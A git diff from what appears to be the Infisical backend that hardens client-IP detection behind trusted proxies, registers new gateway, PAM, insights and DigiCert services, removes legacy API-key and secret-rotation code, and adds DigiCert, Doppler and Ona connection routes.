@@ -1,5 +1,7 @@ import fp from "fastify-plugin"; +import { getConfig } from "@app/lib/config/env"; + /*! https://github.com/pbojinov/request-ip/blob/9501cdf6e73059cc70fc6890adb086348d7cca46/src/index.js. MIT License. 2022 Petar Bojinov - petarbojinov+github@gmail.com */ const headersOrder = [ @@ -20,7 +22,18 @@ const headersOrder = [ export const fastifyIp = fp(async (fastify) => { fastify.decorateRequest("realIp", null); + const { TRUSTED_PROXY_CIDRS } = getConfig(); fastify.addHook("onRequest", async (req) => { + // Strict mode: TRUSTED_PROXY_CIDRS configured β†’ delegate to Fastify's proxy-addr-backed + // req.ip, which validates the socket source against the trusted CIDR list and parses + // X-Forwarded-For right-to-left, discarding attacker-supplied values. + if (TRUSTED_PROXY_CIDRS) { + req.realIp = req.ip; + return; + } + + // Legacy mode: first-matching-header wins. Preserved for backwards compatibility + // with self-hosted deployments that haven't configured a trusted proxy list. const forwardedIpHeader = headersOrder.find((header) => Boolean(req.headers[header])); const forwardedIp = forwardedIpHeader ? 
req.headers[forwardedIpHeader] : undefined; if (forwardedIp) { diff --git a/backend/src/server/routes/index.ts b/backend/src/server/routes/index.ts index 00abff4c158..053908a5c16 100644 --- a/backend/src/server/routes/index.ts +++ b/backend/src/server/routes/index.ts @@ -14,6 +14,7 @@ import { registerCertificateEstRouter } from "@app/ee/routes/est/certificate-est import { registerPkiScepRouter } from "@app/ee/routes/scep/pki-scep-router"; import { registerV1EERoutes } from "@app/ee/routes/v1"; import { registerV2EERoutes } from "@app/ee/routes/v2"; +import { registerV3EERoutes } from "@app/ee/routes/v3"; import { accessApprovalPolicyApproverDALFactory, accessApprovalPolicyBypasserDALFactory @@ -58,6 +59,10 @@ import { externalKmsServiceFactory } from "@app/ee/services/external-kms/externa import { gatewayDALFactory } from "@app/ee/services/gateway/gateway-dal"; import { gatewayServiceFactory } from "@app/ee/services/gateway/gateway-service"; import { orgGatewayConfigDALFactory } from "@app/ee/services/gateway/org-gateway-config-dal"; +import { gatewayPoolDalFactory } from "@app/ee/services/gateway-pool/gateway-pool-dal"; +import { gatewayPoolMembershipDalFactory } from "@app/ee/services/gateway-pool/gateway-pool-membership-dal"; +import { gatewayPoolServiceFactory } from "@app/ee/services/gateway-pool/gateway-pool-service"; +import { gatewayEnrollmentTokenDALFactory } from "@app/ee/services/gateway-v2/gateway-enrollment-token-dal"; import { gatewayV2DalFactory } from "@app/ee/services/gateway-v2/gateway-v2-dal"; import { gatewayV2ServiceFactory } from "@app/ee/services/gateway-v2/gateway-v2-service"; import { orgGatewayConfigV2DalFactory } from "@app/ee/services/gateway-v2/org-gateway-config-v2-dal"; @@ -71,6 +76,7 @@ import { isHsmActiveAndEnabled } from "@app/ee/services/hsm/hsm-fns"; import { THsmServiceFactory } from "@app/ee/services/hsm/hsm-service"; import { identityAuthTemplateDALFactory } from 
"@app/ee/services/identity-auth-template/identity-auth-template-dal"; import { identityAuthTemplateServiceFactory } from "@app/ee/services/identity-auth-template/identity-auth-template-service"; +import { insightsServiceFactory } from "@app/ee/services/insights/insights-service"; import { kmipClientCertificateDALFactory } from "@app/ee/services/kmip/kmip-client-certificate-dal"; import { kmipClientDALFactory } from "@app/ee/services/kmip/kmip-client-dal"; import { kmipOperationServiceFactory } from "@app/ee/services/kmip/kmip-operation-service"; @@ -96,6 +102,8 @@ import { pamDiscoverySourceDependenciesDALFactory } from "@app/ee/services/pam-d import { pamDiscoverySourceResourcesDALFactory } from "@app/ee/services/pam-discovery/pam-discovery-source-resources-dal"; import { pamDiscoveryRunDALFactory } from "@app/ee/services/pam-discovery/pam-discovery-source-run-dal"; import { pamDiscoverySourceServiceFactory } from "@app/ee/services/pam-discovery/pam-discovery-source-service"; +import { pamDomainDALFactory } from "@app/ee/services/pam-domain/pam-domain-dal"; +import { pamDomainServiceFactory } from "@app/ee/services/pam-domain/pam-domain-service"; import { pamFolderDALFactory } from "@app/ee/services/pam-folder/pam-folder-dal"; import { pamFolderServiceFactory } from "@app/ee/services/pam-folder/pam-folder-service"; import { pamResourceDALFactory } from "@app/ee/services/pam-resource/pam-resource-dal"; @@ -127,6 +135,7 @@ import { pkiDiscoveryQueueFactory } from "@app/ee/services/pki-discovery/pki-dis import { pkiDiscoveryScanHistoryDALFactory } from "@app/ee/services/pki-discovery/pki-discovery-scan-history-dal"; import { pkiDiscoveryServiceFactory } from "@app/ee/services/pki-discovery/pki-discovery-service"; import { pkiInstallationServiceFactory } from "@app/ee/services/pki-discovery/pki-installation-service"; +import { scepDynamicChallengeDALFactory } from "@app/ee/services/pki-scep/pki-scep-dynamic-challenge-dal"; import { pkiScepServiceFactory } from 
"@app/ee/services/pki-scep/pki-scep-service"; import { scepTransactionDALFactory } from "@app/ee/services/pki-scep/pki-scep-transaction-dal"; import { projectEventsServiceFactory } from "@app/ee/services/project-events/project-events-service"; @@ -159,9 +168,6 @@ import { secretApprovalRequestReviewerDALFactory } from "@app/ee/services/secret import { secretApprovalRequestSecretDALFactory } from "@app/ee/services/secret-approval-request/secret-approval-request-secret-dal"; import { secretApprovalRequestServiceFactory } from "@app/ee/services/secret-approval-request/secret-approval-request-service"; import { secretReplicationServiceFactory } from "@app/ee/services/secret-replication/secret-replication-service"; -import { secretRotationDALFactory } from "@app/ee/services/secret-rotation/secret-rotation-dal"; -import { secretRotationQueueFactory } from "@app/ee/services/secret-rotation/secret-rotation-queue"; -import { secretRotationServiceFactory } from "@app/ee/services/secret-rotation/secret-rotation-service"; import { secretRotationV2DALFactory } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-dal"; import { secretRotationV2QueueServiceFactory } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-queue"; import { secretRotationV2ServiceFactory } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-service"; @@ -208,8 +214,6 @@ import { accessTokenQueueServiceFactory } from "@app/services/access-token-queue import { accountRecoveryServiceFactory } from "@app/services/account-recovery/account-recovery-service"; import { additionalPrivilegeDALFactory } from "@app/services/additional-privilege/additional-privilege-dal"; import { additionalPrivilegeServiceFactory } from "@app/services/additional-privilege/additional-privilege-service"; -import { apiKeyDALFactory } from "@app/services/api-key/api-key-dal"; -import { apiKeyServiceFactory } from "@app/services/api-key/api-key-service"; import { appConnectionDALFactory } from 
"@app/services/app-connection/app-connection-dal"; import { appConnectionServiceFactory } from "@app/services/app-connection/app-connection-service"; import { @@ -249,6 +253,8 @@ import { certificateAuthorityQueueFactory } from "@app/services/certificate-auth import { certificateAuthoritySecretDALFactory } from "@app/services/certificate-authority/certificate-authority-secret-dal"; import { certificateAuthorityServiceFactory } from "@app/services/certificate-authority/certificate-authority-service"; import { certificateIssuanceQueueFactory } from "@app/services/certificate-authority/certificate-issuance-queue"; +import { DigiCertCertificateAuthorityFns } from "@app/services/certificate-authority/digicert/digicert-certificate-authority-fns"; +import { digicertCertificateAuthorityQueueServiceFactory } from "@app/services/certificate-authority/digicert/digicert-certificate-authority-queue"; import { externalCertificateAuthorityDALFactory } from "@app/services/certificate-authority/external-certificate-authority-dal"; import { internalCertificateAuthorityDALFactory } from "@app/services/certificate-authority/internal/internal-certificate-authority-dal"; import { InternalCertificateAuthorityFns } from "@app/services/certificate-authority/internal/internal-certificate-authority-fns"; @@ -257,6 +263,8 @@ import { certificateCleanupConfigDALFactory } from "@app/services/certificate-cl import { certificateCleanupQueueFactory } from "@app/services/certificate-cleanup/certificate-cleanup-queue"; import { certificateCleanupServiceFactory } from "@app/services/certificate-cleanup/certificate-cleanup-service"; import { certificateEstV3ServiceFactory } from "@app/services/certificate-est-v3/certificate-est-v3-service"; +import { certificateInventoryViewDALFactory } from "@app/services/certificate-inventory-view/certificate-inventory-view-dal"; +import { certificateInventoryViewServiceFactory } from "@app/services/certificate-inventory-view/certificate-inventory-view-service"; 
import { certificatePolicyDALFactory } from "@app/services/certificate-policy/certificate-policy-dal"; import { certificatePolicyServiceFactory } from "@app/services/certificate-policy/certificate-policy-service"; import { certificateProfileDALFactory } from "@app/services/certificate-profile/certificate-profile-dal"; @@ -278,9 +286,9 @@ import { estEnrollmentConfigDALFactory } from "@app/services/enrollment-config/e import { scepEnrollmentConfigDALFactory } from "@app/services/enrollment-config/scep-enrollment-config-dal"; import { externalGroupOrgRoleMappingDALFactory } from "@app/services/external-group-org-role-mapping/external-group-org-role-mapping-dal"; import { externalGroupOrgRoleMappingServiceFactory } from "@app/services/external-group-org-role-mapping/external-group-org-role-mapping-service"; +import { externalMigrationConfigDALFactory } from "@app/services/external-migration/external-migration-config-dal"; import { externalMigrationQueueFactory } from "@app/services/external-migration/external-migration-queue"; import { externalMigrationServiceFactory } from "@app/services/external-migration/external-migration-service"; -import { vaultExternalMigrationConfigDALFactory } from "@app/services/external-migration/vault-external-migration-config-dal"; import { folderCheckpointDALFactory } from "@app/services/folder-checkpoint/folder-checkpoint-dal"; import { folderCheckpointResourcesDALFactory } from "@app/services/folder-checkpoint-resources/folder-checkpoint-resources-dal"; import { folderCommitDALFactory } from "@app/services/folder-commit/folder-commit-dal"; @@ -444,7 +452,6 @@ import { telemetryQueueServiceFactory } from "@app/services/telemetry/telemetry- import { telemetryServiceFactory } from "@app/services/telemetry/telemetry-service"; import { totpConfigDALFactory } from "@app/services/totp/totp-config-dal"; import { totpServiceFactory } from "@app/services/totp/totp-service"; -import { upgradePathServiceFactory } from 
"@app/services/upgrade-path/upgrade-path-service"; import { userDALFactory } from "@app/services/user/user-dal"; import { userServiceFactory } from "@app/services/user/user-service"; import { userAliasDALFactory } from "@app/services/user-alias/user-alias-dal"; @@ -511,7 +518,6 @@ export const registerRoutes = async ( const orgMembershipDAL = orgMembershipDALFactory(db); const incidentContactDAL = incidentContactDALFactory(db); const rateLimitDAL = rateLimitDALFactory(db); - const apiKeyDAL = apiKeyDALFactory(db); const projectDAL = projectDALFactory(db); const projectSshConfigDAL = projectSshConfigDALFactory(db); @@ -599,7 +605,6 @@ export const registerRoutes = async ( const secretApprovalRequestReviewerDAL = secretApprovalRequestReviewerDALFactory(db); const secretApprovalRequestSecretDAL = secretApprovalRequestSecretDALFactory(db); - const secretRotationDAL = secretRotationDALFactory(db); const snapshotDAL = snapshotDALFactory(db); const snapshotSecretDAL = snapshotSecretDALFactory(db); const snapshotSecretV2BridgeDAL = snapshotSecretV2DALFactory(db); @@ -675,7 +680,7 @@ export const registerRoutes = async ( const appConnectionCredentialRotationDAL = appConnectionCredentialRotationDALFactory(db); - const vaultExternalMigrationConfigDAL = vaultExternalMigrationConfigDALFactory(db); + const externalMigrationConfigDAL = externalMigrationConfigDALFactory(db); // New event bus for inter-container communication const eventBusService = eventBusServiceFactory({ redis: server.redis }); @@ -694,7 +699,6 @@ export const registerRoutes = async ( }); const assumePrivilegeService = assumePrivilegeServiceFactory({ - projectDAL, permissionService }); @@ -874,7 +878,6 @@ export const registerRoutes = async ( }); const groupProjectService = groupProjectServiceFactory({ groupDAL, - projectDAL, permissionService }); @@ -977,12 +980,11 @@ export const registerRoutes = async ( membershipUserDAL }); - const upgradePathService = upgradePathServiceFactory({ keyStore }); - const 
totpService = totpServiceFactory({ totpConfigDAL, userDAL, - kmsService + kmsService, + keyStore }); const webAuthnService = webAuthnServiceFactory({ @@ -1177,7 +1179,6 @@ export const registerRoutes = async ( rateLimitDAL, licenseService }); - const apiKeyService = apiKeyServiceFactory({ apiKeyDAL, userDAL }); const secretScanningQueue = secretScanningQueueFactory({ telemetryService, @@ -1256,12 +1257,14 @@ export const registerRoutes = async ( const acmeEnrollmentConfigDAL = acmeEnrollmentConfigDALFactory(db); const scepEnrollmentConfigDAL = scepEnrollmentConfigDALFactory(db); const scepTransactionDAL = scepTransactionDALFactory(db); + const scepDynamicChallengeDAL = scepDynamicChallengeDALFactory(db); const acmeAccountDAL = pkiAcmeAccountDALFactory(db); const acmeOrderDAL = pkiAcmeOrderDALFactory(db); const acmeAuthDAL = pkiAcmeAuthDALFactory(db); const acmeOrderAuthDAL = pkiAcmeOrderAuthDALFactory(db); const acmeChallengeDAL = pkiAcmeChallengeDALFactory(db); const certificateCleanupConfigDAL = certificateCleanupConfigDALFactory(db); + const certificateInventoryViewDAL = certificateInventoryViewDALFactory(db); const certificateDAL = certificateDALFactory(db); const certificateBodyDAL = certificateBodyDALFactory(db); const certificateSecretDAL = certificateSecretDALFactory(db); @@ -1287,6 +1290,9 @@ export const registerRoutes = async ( const orgRelayConfigDAL = orgRelayConfigDalFactory(db); const relayDAL = relayDalFactory(db); const gatewayV2DAL = gatewayV2DalFactory(db); + const gatewayEnrollmentTokenDAL = gatewayEnrollmentTokenDALFactory(db); + const gatewayPoolDAL = gatewayPoolDalFactory(db); + const gatewayPoolMembershipDAL = gatewayPoolMembershipDalFactory(db); const approvalPolicyDAL = approvalPolicyDALFactory(db); @@ -1374,6 +1380,7 @@ export const registerRoutes = async ( estEnrollmentConfigDAL, acmeEnrollmentConfigDAL, scepEnrollmentConfigDAL, + scepDynamicChallengeDAL, certificateBodyDAL, certificateSecretDAL, certificateAuthorityDAL, @@ -1445,6 
+1452,7 @@ export const registerRoutes = async ( relayService, orgGatewayConfigV2DAL, gatewayV2DAL, + gatewayEnrollmentTokenDAL, relayDAL, permissionService, orgDAL, @@ -1459,6 +1467,16 @@ export const registerRoutes = async ( pkiDiscoveryConfigDAL }); + const gatewayPoolService = gatewayPoolServiceFactory({ + gatewayPoolDAL, + gatewayPoolMembershipDAL, + gatewayV2DAL, + gatewayV2Service, + permissionService, + licenseService, + identityKubernetesAuthDAL + }); + const secretSyncQueue = secretSyncQueueFactory({ queueService, secretSyncDAL, @@ -1518,7 +1536,6 @@ export const registerRoutes = async ( secretVersionV2BridgeDAL, secretV2BridgeDAL, secretVersionTagV2BridgeDAL, - secretRotationDAL, integrationAuthDAL, snapshotDAL, snapshotSecretV2BridgeDAL, @@ -1582,7 +1599,6 @@ export const registerRoutes = async ( projectEnvDAL, keyStore, licenseService, - projectDAL, folderDAL, accessApprovalPolicyEnvironmentDAL, secretApprovalPolicyEnvironmentDAL: sapEnvironmentDAL @@ -1623,7 +1639,8 @@ export const registerRoutes = async ( permissionService, kmsService, folderDAL, - secretDAL: secretV2BridgeDAL + secretDAL: secretV2BridgeDAL, + secretVersionV2BridgeDAL }); const folderService = secretFolderServiceFactory({ permissionService, @@ -1810,32 +1827,6 @@ export const registerRoutes = async ( folderCommitService }); - const secretRotationQueue = secretRotationQueueFactory({ - telemetryService, - secretRotationDAL, - queue: queueService, - secretDAL, - secretVersionDAL, - projectBotService, - secretVersionV2BridgeDAL, - secretV2BridgeDAL, - folderCommitService, - kmsService - }); - - const secretRotationService = secretRotationServiceFactory({ - permissionService, - secretRotationDAL, - secretRotationQueue, - projectDAL, - licenseService, - secretDAL, - folderDAL, - projectBotService, - secretV2BridgeDAL, - kmsService - }); - const integrationService = integrationServiceFactory({ permissionService, folderDAL, @@ -1949,7 +1940,9 @@ export const registerRoutes = async ( 
gatewayV2DAL, gatewayDAL, kmsService, - membershipIdentityDAL + membershipIdentityDAL, + gatewayPoolService, + gatewayPoolDAL }); const identityGcpAuthService = identityGcpAuthServiceFactory({ identityDAL, @@ -2104,6 +2097,11 @@ export const registerRoutes = async ( permissionService }); + const certificateInventoryViewService = certificateInventoryViewServiceFactory({ + certificateInventoryViewDAL, + permissionService + }); + const certificateCleanupQueue = certificateCleanupQueueFactory({ db, queueService, @@ -2314,7 +2312,6 @@ export const registerRoutes = async ( appConnectionService, kmsService, permissionService, - projectDAL, orgDAL, folderDAL, secretSyncQueue, @@ -2336,7 +2333,6 @@ export const registerRoutes = async ( const kmipOperationService = kmipOperationServiceFactory({ kmsService, kmsDAL, - projectDAL, kmipClientDAL, permissionService }); @@ -2365,6 +2361,19 @@ export const registerRoutes = async ( gatewayV2Service }); + const insightsService = insightsServiceFactory({ + permissionService, + licenseService, + auditLogDAL, + secretRotationV2DAL, + reminderDAL, + folderDAL, + secretV2BridgeDAL, + projectBotService, + userDAL, + keyStore + }); + const pkiSyncQueue = pkiSyncQueueFactory({ queueService, kmsService, @@ -2474,7 +2483,10 @@ export const registerRoutes = async ( pkiSubscriberDAL, projectDAL, pkiSyncDAL, - pkiSyncQueue + pkiSyncQueue, + certificateRequestDAL, + resourceMetadataDAL, + gatewayV2Service }); const certificateEstService = certificateEstServiceFactory({ @@ -2519,6 +2531,18 @@ export const registerRoutes = async ( pkiAlertV2Queue }); + const digicertCaFns = DigiCertCertificateAuthorityFns({ + appConnectionDAL, + appConnectionService, + certificateAuthorityDAL, + externalCertificateAuthorityDAL, + certificateDAL, + certificateBodyDAL, + certificateSecretDAL, + kmsService, + projectDAL + }); + const certificateRequestService = certificateRequestServiceFactory({ certificateRequestDAL, certificateDAL, @@ -2543,8 +2567,10 @@ export const 
registerRoutes = async ( pkiSyncQueue, certificateProfileDAL, certificateRequestService, + certificateRequestDAL, resourceMetadataDAL, - pkiAlertV2Queue + pkiAlertV2Queue, + gatewayV2Service }); const certificateApprovalService = certificateApprovalServiceFactory({ @@ -2618,10 +2644,22 @@ export const registerRoutes = async ( auditLogService }); + const digicertCaQueue = digicertCertificateAuthorityQueueServiceFactory({ + queueService, + certificateRequestDAL, + certificateRequestService, + certificateAuthorityDAL, + appConnectionDAL, + kmsService, + resourceMetadataDAL, + digicertFns: digicertCaFns + }); + const certificateEstV3Service = certificateEstV3ServiceFactory({ certificateV3Service, certificateAuthorityDAL, certificateAuthorityCertDAL, + certificateDAL, projectDAL, kmsService, licenseService, @@ -2634,7 +2672,9 @@ export const registerRoutes = async ( certificateV3Service, certificateProfileDAL, scepEnrollmentConfigDAL, + scepDynamicChallengeDAL, scepTransactionDAL, + certificateDAL, certificateAuthorityDAL, certificateAuthorityCertDAL, certificateRequestDAL, @@ -2646,7 +2686,8 @@ export const registerRoutes = async ( certificatePolicyService, certificateRequestService, certificateIssuanceQueue, - auditLogService + auditLogService, + permissionService }); const acmeChallengeService = pkiAcmeChallengeServiceFactory({ @@ -2731,7 +2772,6 @@ export const registerRoutes = async ( const pkiDiscoveryService = pkiDiscoveryServiceFactory({ pkiDiscoveryConfigDAL, pkiDiscoveryScanHistoryDAL, - projectDAL, permissionService, gatewayV2DAL, queuePkiDiscoveryScan: pkiDiscoveryQueue.queuePkiDiscoveryScan @@ -2814,6 +2854,7 @@ export const registerRoutes = async ( }); const pamFolderDAL = pamFolderDALFactory(db); + const pamDomainDAL = pamDomainDALFactory(db); const pamResourceFavoriteDAL = pamResourceFavoriteDALFactory(db); const pamAccountDAL = pamAccountDALFactory(db); const pamAccountPolicyDAL = pamAccountPolicyDALFactory(db); @@ -2841,6 +2882,7 @@ export const 
registerRoutes = async ( const pamResourceService = pamResourceServiceFactory({ pamResourceDAL, pamResourceFavoriteDAL, + pamDomainDAL, pamAccountDAL, permissionService, kmsService, @@ -2849,6 +2891,15 @@ export const registerRoutes = async ( appConnectionDAL }); + const pamDomainService = pamDomainServiceFactory({ + pamDomainDAL, + pamResourceDAL, + permissionService, + kmsService, + gatewayV2Service, + resourceMetadataDAL + }); + const pamResourceRotationRulesService = pamResourceRotationRulesServiceFactory({ pamResourceRotationRulesDAL, pamResourceDAL, @@ -2884,6 +2935,7 @@ export const registerRoutes = async ( const pamAccountService = pamAccountServiceFactory({ pamAccountDAL, + pamDomainDAL, pamAccountPolicyDAL, pamResourceRotationRulesDAL, gatewayV2Service, @@ -2902,7 +2954,8 @@ export const registerRoutes = async ( approvalPolicyDAL, pamSessionExpirationService, resourceMetadataDAL, - pamAccountDependenciesDAL + pamAccountDependenciesDAL, + keyStore }); const pamAccountRotation = pamAccountRotationServiceFactory({ @@ -2923,6 +2976,7 @@ export const registerRoutes = async ( const pamWebAccessService = pamWebAccessServiceFactory({ pamAccountDAL, + pamAccountPolicyDAL, pamResourceDAL, permissionService, auditLogService, @@ -2946,6 +3000,7 @@ export const registerRoutes = async ( pamDiscoverySourceAccountsDAL, pamDiscoverySourceDependenciesDAL, pamAccountDependenciesDAL, + pamDomainDAL, pamResourceDAL, pamAccountDAL, kmsService, @@ -3010,7 +3065,7 @@ export const registerRoutes = async ( gatewayService, kmsService, appConnectionService, - vaultExternalMigrationConfigDAL, + externalMigrationConfigDAL, secretService, auditLogService, gatewayV2Service @@ -3068,6 +3123,7 @@ export const registerRoutes = async ( await pkiAlertV2Queue.init(); await certificateCleanupQueue.init(); await certificateV3Queue.init(); + await digicertCaQueue.init(); await caAutoRenewalQueue.startDailyAutoRenewalJob(); await microsoftTeamsService.start(); await eventBusService.init(); @@ 
-3085,7 +3141,6 @@ export const registerRoutes = async ( org: orgService, subOrganization: subOrgService, oidc: oidcService, - apiKey: apiKeyService, authToken: tokenService, superAdmin: superAdminService, offlineUsageReport: offlineUsageReportService, @@ -3126,7 +3181,6 @@ export const registerRoutes = async ( accessApprovalRequest: accessApprovalRequestService, secretApprovalPolicy: secretApprovalPolicyService, secretApprovalRequest: secretApprovalRequestService, - secretRotation: secretRotationService, dynamicSecret: dynamicSecretService, dynamicSecretLease: dynamicSecretLeaseService, emailDomain: emailDomainService, @@ -3137,6 +3191,7 @@ export const registerRoutes = async ( auditLogStream: auditLogStreamService, certificate: certificateService, certificateCleanup: certificateCleanupService, + certificateInventoryView: certificateInventoryViewService, certificateV3: certificateV3Service, certificateRequest: certificateRequestService, certificateEstV3: certificateEstV3Service, @@ -3189,9 +3244,11 @@ export const registerRoutes = async ( gateway: gatewayService, relay: relayService, gatewayV2: gatewayV2Service, + gatewayPool: gatewayPoolService, secretRotationV2: secretRotationV2Service, microsoftTeams: microsoftTeamsService, assumePrivileges: assumePrivilegeService, + insights: insightsService, githubOrgSync: githubOrgSyncConfigService, folderCommit: folderCommitService, secretScanningV2: secretScanningV2Service, @@ -3202,6 +3259,7 @@ export const registerRoutes = async ( notification: notificationService, pamFolder: pamFolderService, pamResource: pamResourceService, + pamDomain: pamDomainService, pamResourceRotationRules: pamResourceRotationRulesService, pamAccount: pamAccountService, pamAccountPolicy: pamAccountPolicyService, @@ -3209,8 +3267,6 @@ export const registerRoutes = async ( pamWebAccess: pamWebAccessService, pamDiscoverySource: pamDiscoverySourceService, mfaSession: mfaSessionService, - upgradePath: upgradePathService, - membershipUser: 
membershipUserService, membershipIdentity: membershipIdentityService, membershipGroup: membershipGroupService, @@ -3357,7 +3413,13 @@ export const registerRoutes = async ( }, { prefix: "/api/v2" } ); - await server.register(registerV3Routes, { prefix: "/api/v3" }); + await server.register( + async (v3Server) => { + await v3Server.register(registerV3EERoutes); + await v3Server.register(registerV3Routes); + }, + { prefix: "/api/v3" } + ); await server.register(registerV4Routes, { prefix: "/api/v4" }); // Note: This is a special route for BDD tests. It's only available in development mode and only for BDD tests. diff --git a/backend/src/server/routes/sanitizedSchemas.ts b/backend/src/server/routes/sanitizedSchemas.ts index 226f17fff1a..e156b3e9516 100644 --- a/backend/src/server/routes/sanitizedSchemas.ts +++ b/backend/src/server/routes/sanitizedSchemas.ts @@ -113,6 +113,7 @@ export const SanitizedUserSchema = UsersSchema.pick({ isEmailVerified: true, firstName: true, lastName: true, + authMethods: true, id: true }).extend({ publicKey: z.string().nullable().optional() diff --git a/backend/src/server/routes/v1/app-connection-routers/app-connection-endpoints.ts b/backend/src/server/routes/v1/app-connection-routers/app-connection-endpoints.ts index 08178345eb1..912a8876860 100644 --- a/backend/src/server/routes/v1/app-connection-routers/app-connection-endpoints.ts +++ b/backend/src/server/routes/v1/app-connection-routers/app-connection-endpoints.ts @@ -54,7 +54,8 @@ export const registerAppConnectionEndpoints = { diff --git a/backend/src/server/routes/v1/app-connection-routers/aws-connection-router.ts b/backend/src/server/routes/v1/app-connection-routers/aws-connection-router.ts index 92eedb1165d..4dc0abf38a7 100644 --- a/backend/src/server/routes/v1/app-connection-routers/aws-connection-router.ts +++ b/backend/src/server/routes/v1/app-connection-routers/aws-connection-router.ts @@ -94,7 +94,12 @@ export const registerAwsConnectionRouter = async (server: 
FastifyZodProvider) => req.permission ); - return { iamUsers }; + return { + iamUsers: iamUsers.map((user) => ({ + UserName: user.UserName ?? "", + Arn: user.Arn ?? "" + })) + }; } }); }; diff --git a/backend/src/server/routes/v1/app-connection-routers/digicert-connection-router.ts b/backend/src/server/routes/v1/app-connection-routers/digicert-connection-router.ts new file mode 100644 index 00000000000..05ad021b4cb --- /dev/null +++ b/backend/src/server/routes/v1/app-connection-routers/digicert-connection-router.ts @@ -0,0 +1,81 @@ +import z from "zod"; + +import { readLimit } from "@app/server/config/rateLimiter"; +import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { + CreateDigiCertConnectionSchema, + SanitizedDigiCertConnectionSchema, + UpdateDigiCertConnectionSchema +} from "@app/services/app-connection/digicert/digicert-connection-schemas"; +import { AuthMode } from "@app/services/auth/auth-type"; + +import { registerAppConnectionEndpoints } from "./app-connection-endpoints"; + +export const registerDigiCertConnectionRouter = async (server: FastifyZodProvider) => { + registerAppConnectionEndpoints({ + app: AppConnection.DigiCert, + server, + sanitizedResponseSchema: SanitizedDigiCertConnectionSchema, + createSchema: CreateDigiCertConnectionSchema, + updateSchema: UpdateDigiCertConnectionSchema + }); + + server.route({ + method: "GET", + url: `/:connectionId/organizations`, + config: { + rateLimit: readLimit + }, + schema: { + operationId: "listDigiCertOrganizations", + params: z.object({ + connectionId: z.string().uuid() + }), + response: { + 200: z + .object({ + id: z.number(), + name: z.string(), + displayName: z.string().optional(), + status: z.string().optional() + }) + .array() + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + const { connectionId } = req.params; + return 
server.services.appConnection.digicert.listOrganizations(connectionId, req.permission); + } + }); + + server.route({ + method: "GET", + url: `/:connectionId/products`, + config: { + rateLimit: readLimit + }, + schema: { + operationId: "listDigiCertProducts", + params: z.object({ + connectionId: z.string().uuid() + }), + response: { + 200: z + .object({ + nameId: z.string(), + name: z.string(), + type: z.string().optional(), + validationType: z.string().optional() + }) + .array() + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + const { connectionId } = req.params; + return server.services.appConnection.digicert.listProducts(connectionId, req.permission); + } + }); +}; diff --git a/backend/src/server/routes/v1/app-connection-routers/doppler-connection-router.ts b/backend/src/server/routes/v1/app-connection-routers/doppler-connection-router.ts new file mode 100644 index 00000000000..12dc6932b94 --- /dev/null +++ b/backend/src/server/routes/v1/app-connection-routers/doppler-connection-router.ts @@ -0,0 +1,18 @@ +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { + CreateDopplerConnectionSchema, + SanitizedDopplerConnectionSchema, + UpdateDopplerConnectionSchema +} from "@app/services/app-connection/doppler/doppler-connection-schema"; + +import { registerAppConnectionEndpoints } from "./app-connection-endpoints"; + +export const registerDopplerConnectionRouter = async (server: FastifyZodProvider) => { + registerAppConnectionEndpoints({ + app: AppConnection.Doppler, + server, + sanitizedResponseSchema: SanitizedDopplerConnectionSchema, + createSchema: CreateDopplerConnectionSchema, + updateSchema: UpdateDopplerConnectionSchema + }); +}; diff --git a/backend/src/server/routes/v1/app-connection-routers/index.ts b/backend/src/server/routes/v1/app-connection-routers/index.ts index 0755d814e21..e6a9250160d 100644 --- a/backend/src/server/routes/v1/app-connection-routers/index.ts +++ 
b/backend/src/server/routes/v1/app-connection-routers/index.ts @@ -21,8 +21,10 @@ import { registerCircleCIConnectionRouter } from "./circleci-connection-router"; import { registerCloudflareConnectionRouter } from "./cloudflare-connection-router"; import { registerDatabricksConnectionRouter } from "./databricks-connection-router"; import { registerDbtConnectionRouter } from "./dbt-connection-router"; +import { registerDigiCertConnectionRouter } from "./digicert-connection-router"; import { registerDigitalOceanConnectionRouter } from "./digital-ocean-connection-router"; import { registerDNSMadeEasyConnectionRouter } from "./dns-made-easy-connection-router"; +import { registerDopplerConnectionRouter } from "./doppler-connection-router"; import { registerExternalInfisicalConnectionRouter } from "./external-infisical-connection-router"; import { registerFlyioConnectionRouter } from "./flyio-connection-router"; import { registerGcpConnectionRouter } from "./gcp-connection-router"; @@ -42,6 +44,7 @@ import { registerNetScalerConnectionRouter } from "./netscaler-connection-router import { registerNorthflankConnectionRouter } from "./northflank-connection-router"; import { registerOctopusDeployConnectionRouter } from "./octopus-deploy-connection-router"; import { registerOktaConnectionRouter } from "./okta-connection-router"; +import { registerOnaConnectionRouter } from "./ona-connection-router"; import { registerOpenRouterConnectionRouter } from "./open-router-connection-router"; import { registerPostgresConnectionRouter } from "./postgres-connection-router"; import { registerRailwayConnectionRouter } from "./railway-connection-router"; @@ -52,7 +55,9 @@ import { registerSshConnectionRouter } from "./ssh-connection-router"; import { registerSupabaseConnectionRouter } from "./supabase-connection-router"; import { registerTeamCityConnectionRouter } from "./teamcity-connection-router"; import { registerTerraformCloudConnectionRouter } from "./terraform-cloud-router"; +import 
{ registerTravisCIConnectionRouter } from "./travis-ci-connection-router"; import { registerVenafiConnectionRouter } from "./venafi-connection-router"; +import { registerVenafiTppConnectionRouter } from "./venafi-tpp-connection-router"; import { registerVercelConnectionRouter } from "./vercel-connection-router"; import { registerWindmillConnectionRouter } from "./windmill-connection-router"; import { registerZabbixConnectionRouter } from "./zabbix-connection-router"; @@ -114,7 +119,12 @@ export const APP_CONNECTION_REGISTER_ROUTER_MAP: Record { + registerAppConnectionEndpoints({ + app: AppConnection.Ona, + server, + sanitizedResponseSchema: SanitizedOnaConnectionSchema, + createSchema: CreateOnaConnectionSchema, + updateSchema: UpdateOnaConnectionSchema + }); + + // The below endpoints are not exposed and for Infisical App use + server.route({ + method: "GET", + url: `/:connectionId/projects`, + config: { + rateLimit: readLimit + }, + schema: { + operationId: "listOnaProjects", + params: z.object({ + connectionId: z.string().uuid() + }), + response: { + 200: z + .object({ + id: z.string(), + name: z.string() + }) + .array() + } + 